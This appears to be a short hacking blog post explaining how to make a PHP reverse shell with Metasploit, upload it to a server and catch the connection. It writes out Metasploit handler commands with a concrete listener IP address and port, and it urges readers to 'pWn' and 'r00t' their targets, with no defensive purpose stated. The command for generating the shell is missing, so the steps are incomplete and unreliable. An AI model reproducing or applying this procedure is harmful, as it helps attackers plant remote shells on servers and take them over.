Metasploit comes with some built-in Reverse Shells generating power. You can easily create Reverse shells with very small commands.
PHP reverse Shell can be create a small command.
PHP Reverse Shell
PHP reverse Shell can be create a small command.
- Open Terminal in your Linux OS
- Copy the bellow command and execute this command. Thats all for generate PHP Reverse Shell
Note:
[Note: reverse_perl.pl is created by another command. Here we don't want to use this.]
Upload reverse.php to any server.
[Download this CommandExecutor & Uploader from here ]
Open Uploaded reverse.php in your favourite Web Browser.
Accept Reverse Connect Using Metasploit
Open Metasploit Console.msf exploit(handler) > set LHOST 117.235.152.218
LHOST => 117.235.152.218
msf exploit(handler) > set LPORT 5600
LPORT => 5600
msf exploit(handler) > exploit -z -j
After Successfully connected you can execute "shell" for pWn targets Terminal. Then r00t your targets.
1 comments :
Write commentswrite your comments about this metasploit reverse shell generating tutorial...
Reply